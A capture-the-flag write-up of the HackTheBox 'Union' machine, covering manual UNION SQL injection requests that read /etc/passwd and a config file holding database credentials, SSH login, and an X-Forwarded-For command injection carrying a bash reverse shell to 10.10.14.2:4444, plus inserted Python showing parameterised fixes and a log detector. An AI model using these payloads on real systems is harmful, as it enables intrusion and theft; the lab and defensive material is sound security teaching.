Union-htb-writeup

0x00 Skills covered

Skills in this chapter: manual SQL injection, exploiting the load_file function through SQL injection, analysing the website's source code, command execution via the XFF header

Reference: https://pencer.io/ctf/ctf-htb-union/#reverse-shell

Reference: https://0xdf.gitlab.io/2021/11/22/htb-union.html

0x01 Getting user access

1. About the target

About Union
Union is a medium-difficulty Linux machine whose web application is vulnerable to SQL injection. A filter on the machine prevents SQLMap from dumping the database, so the user has to craft union statements by hand to extract information from the database and from the website's source code. The database contains a flag that can be used to authenticate to the machine; after authentication, the web server runs an iptables command to open port 22. The SSH credentials are in the PHP configuration file used to authenticate to MySQL. Once on the machine, the user can inspect the web application's source code and discover that, by setting the X-FORWARDED-FOR header, they can inject commands into the system command the web server uses to whitelist IP addresses.

2. Check connectivity to the target

┌──(kali㉿offsec)-[~/Desktop]
└─$ ping 10.10.11.128 -c 4
PING 10.10.11.128 (10.10.11.128) 56(84) bytes of data.
64 bytes from 10.10.11.128: icmp_seq=1 ttl=63 time=146 ms
64 bytes from 10.10.11.128: icmp_seq=2 ttl=63 time=102 ms
64 bytes from 10.10.11.128: icmp_seq=3 ttl=63 time=116 ms
64 bytes from 10.10.11.128: icmp_seq=4 ttl=63 time=116 ms

--- 10.10.11.128 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3000ms
rtt min/avg/max/mdev = 102.477/119.972/145.730/15.840 ms

3. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allports 10.10.11.128
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 09:33 CST
Nmap scan report for 10.10.11.128
Host is up (0.50s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 17.14 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
80,
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -Pn -sV -sC 10.10.11.128 -p 80 -oN PortList.txt --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 09:34 CST
Nmap scan report for 10.10.11.128
Host is up (0.79s latency).

PORT STATE SERVICE VERSION
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.97 seconds

4. Only one port is open, so let's visit it

http://10.10.11.128/

5. After some initial probing, the page appears to be vulnerable to SQL injection

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=shiyan';-- -';

6. Query the current database user

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 33
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select user();-- -

7. Query the database names

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 85
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.schemata;-- -

8. Query the table names

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 112
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(table_name) from INFORMATION_SCHEMA.tables where table_schema='november';-- -

9. Query the column names

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 131
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(table_name, ':', column_name) from INFORMATION_SCHEMA.columns where table_schema='november';-- -

10. Query the flag

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 54
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(one) from flag;-- -

11. Query the contents of the player column

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select group_concat(player) from players;-- -
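To show why the player lookup above can be turned into a UNION query, here is an added example (not code from the writeup or from the Union machine) that rebuilds the vulnerable lookup and its parameterised fix on an in-memory SQLite stand-in. The table and column names (players.player, flag.one) are the ones enumerated above; the row contents and the exact shape of the index.php query are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the 'november' database: table and column names
# come from the writeup, the row contents are made up.
SAMPLE_FLAG = "UHC{constructed-sample-flag}"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE players (player TEXT);
        CREATE TABLE flag (one TEXT);
        INSERT INTO players VALUES ('alice'), ('bob');
    """)
    conn.execute("INSERT INTO flag VALUES (?)", (SAMPLE_FLAG,))
    return conn

def lookup_concat(conn, player):
    """Assumed shape of the vulnerable index.php lookup: the submitted value is spliced
    straight into the SQL text, so a quote closes the string literal and UNION appends
    a second SELECT whose result is rendered in place of the player name."""
    sql = "SELECT player FROM players WHERE player = '" + player + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_param(conn, player):
    """Hardened form: the value is bound as a parameter, so it is compared as data and
    never parsed as SQL, whatever quotes or keywords it contains."""
    rows = conn.execute("SELECT player FROM players WHERE player = ?", (player,))
    return [row[0] for row in rows]

# The writeup's flag-extraction payload minus the trailing ';' (sqlite3's execute()
# takes a single statement); the comment marker still swallows the closing quote.
PAYLOAD = "' union select group_concat(one) from flag -- -"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concat(db, PAYLOAD))   # the flag row leaks
    print("parameterised:", lookup_param(db, PAYLOAD))   # []
```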

12. Enter the flag value we obtained into the page

13. The page redirects to /firewall.php

14. Enter the flag again on the page we were redirected to

http://10.10.11.128/firewall.php

Join the UHC - November Qualifiers
Welcome Back!
Your IP Address has now been granted SSH Access.

15. Now scan again to see whether the SSH port is open

┌──(kali㉿offsec)-[~/Desktop]
└─$ nmap -p 22 10.10.11.128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 10:08 CST
Nmap scan report for 10.10.11.128
Host is up (0.16s latency).

PORT STATE SERVICE
22/tcp open ssh

Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds

16. It is indeed open, so we need local account credentials. First, use the SQL injection to read the passwd file

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select load_file('/etc/passwd');--

17. Read the website's configuration file

POST /index.php HTTP/1.1
Host: 10.10.11.128
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 64
Origin: http://10.10.11.128
Connection: close
Referer: http://10.10.11.128/
Cookie: PHPSESSID=jv95ej2q3d1mmegka4qv15ikj8

player=' union select load_file('/var/www/html/config.php');-- -

Sorry, <?php
session_start();
$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-11qual-global-pw";
$dbname = "november";

$conn = new mysqli($servername, $username, $password, $dbname);
?>
you are not eligible due to already qualifying.

18. Now try logging in to the system with these credentials

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh uhc@10.10.11.128
The authenticity of host '10.10.11.128 (10.10.11.128)' can't be established.
ED25519 key fingerprint is SHA256:hE6H4DrsHebfs+gclhz9SL77tMpy8aKR3vp8Y0NRDvY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:29: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.128' (ED25519) to the list of known hosts.
uhc@10.10.11.128's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-77-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Nov 8 21:19:42 2021 from 10.10.14.8
uhc@union:~$ id
uid=1001(uhc) gid=1001(uhc) groups=1001(uhc)
uhc@union:~$

19. That works, so grab the first flag

uhc@union:~$ ls
user.txt
uhc@union:~$ cat user.txt
9607b165bcfc305203fff898dfbff15d
uhc@union:~$

0x02 Getting root access

20. Analysing the website's firewall.php file shows that it allows command execution

uhc@union:~$ cd /var/www/html/
uhc@union:/var/www/html$ ls -la
total 16
drwxr-xr-x 1 root root 94 Nov 8 2021 .
drwxr-xr-x 1 root root 8 Jul 2 2021 ..
-rw-r--r-- 1 htb htb 1203 Nov 5 2021 challenge.php
-rw-r--r-- 1 htb htb 207 Nov 4 2021 config.php
drwxr-xr-x 1 htb htb 34 Nov 4 2021 css
-rw-r--r-- 1 htb htb 1028 Nov 5 2021 firewall.php
-rw-r--r-- 1 htb htb 2093 Nov 4 2021 index.php
uhc@union:/var/www/html$ cat firewall.php
<?php
require('config.php');

if (!($_SESSION['Authenticated'])) {
echo "Access Denied";
exit;
}

?>
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<!------ Include the above in your HEAD tag ---------->

<div class="container">
<h1 class="text-center m-5">Join the UHC - November Qualifiers</h1>

</div>
<section class="bg-dark text-center p-5 mt-4">
<div class="container p-5">
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
};
system("sudo /usr/sbin/iptables -A INPUT -s " . $ip . " -j ACCEPT");
?>
<h1 class="text-white">Welcome Back!</h1>
<h3 class="text-white">Your IP Address has now been granted SSH Access.</h3>
</div>
</section>
</div>
uhc@union:/var/www/html$

21. The user input is not filtered, which produces a command execution vulnerability; let's try to exploit it

┌─[us-vip-22]─[10.10.14.2]─[shiyan@htb-lnf0ywzdjr]─[~/Desktop]
└──╼ [★]$ curl -X GET -H 'X-FORWARDED-FOR: ;bash -c "bash -i >& /dev/tcp/10.10.14.2/4444 0>&1";' --cookie "PHPSESSID=vflfp91f6ua2otqaa2unqdrd4v" 'http://10.10.11.128/firewall.php'

┌─[us-vip-22]─[10.10.14.2]─[shiyan@htb-lnf0ywzdjr]─[~/Desktop]
└──╼ [★]$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.128] 49146
bash: cannot set terminal process group (718): Inappropriate ioctl for device
bash: no job control in this shell
www-data@union:~/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on union:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on union:
(ALL : ALL) NOPASSWD: ALL
www-data@union:~/html$
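The root cause in firewall.php is that a client-controlled header is spliced into a shell command line. As an added example (not code from the writeup or from the machine), the block below shows the two checks a defender would want: the allow-listing step rebuilt so that only a validated IP literal reaches iptables, and no shell parses it, plus a scan over constructed nginx access-log lines that flags X-Forwarded-For values which are not plain IP lists. It assumes an nginx log_format that appends "$http_x_forwarded_for" as the last quoted field (nginx logs a literal " as \x22, which is what the sample relies on).

```python
import ipaddress
import re

def is_ip_list(value):
    """True only if value is '-' (header absent) or a comma-separated list of IP literals."""
    if value in ("", "-"):
        return True
    for item in value.split(","):
        try:
            ipaddress.ip_address(item.strip())
        except ValueError:
            return False
    return True

XFF_FIELD = re.compile(r'"([^"]*)"\s*$')  # last quoted field of each access-log line

def suspicious_xff(log_text):
    """Return (line_no, xff_value) for requests whose X-Forwarded-For is not an IP list;
    shell metacharacters in that header are the signature of the firewall.php injection."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = XFF_FIELD.search(line)
        if m and not is_ip_list(m.group(1)):
            hits.append((n, m.group(1)))
    return hits

def iptables_argv(remote_addr, xff=None):
    """Hardened version of the firewall.php logic. Only honour the header when a trusted
    reverse proxy sets it; accept a single IP literal; build an argv list so the value is
    passed to iptables as one argument instead of being parsed by /bin/sh."""
    candidate = xff if xff is not None else remote_addr
    ip = ipaddress.ip_address(candidate.strip())  # ValueError on anything but an IP
    return ["sudo", "/usr/sbin/iptables", "-A", "INPUT", "-s", str(ip), "-j", "ACCEPT"]

# Constructed access-log lines (assumed log_format with X-Forwarded-For as the last field).
SAMPLE_LOG = "\n".join([
    r'10.10.14.2 - - [13/Oct/2024:10:08:01 +0000] "GET /firewall.php HTTP/1.1" 200 512 "-" "curl/8.0" "-"',
    r'10.10.14.2 - - [13/Oct/2024:10:08:05 +0000] "GET /firewall.php HTTP/1.1" 200 512 "-" "curl/8.0" "10.10.14.2"',
    r'10.10.14.2 - - [13/Oct/2024:10:08:09 +0000] "GET /firewall.php HTTP/1.1" 200 512 "-" "curl/8.0" ";bash -c \x22id\x22;"',
])

if __name__ == "__main__":
    print(suspicious_xff(SAMPLE_LOG))          # [(3, ';bash -c \\x22id\\x22;')]
    print(iptables_argv("10.10.14.2"))         # argv list with a validated address
```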

22. Then grab the final flag

www-data@union:~/html$ sudo -i
sudo -i
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
snap
cat root.txt
15f16a14142dfe8f004cfccdc32f8cdb

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/418

Source: https://sh1yan.top/2024/10/13/Union-htb-writeup/
Author: shiyan
Published: 13 October 2024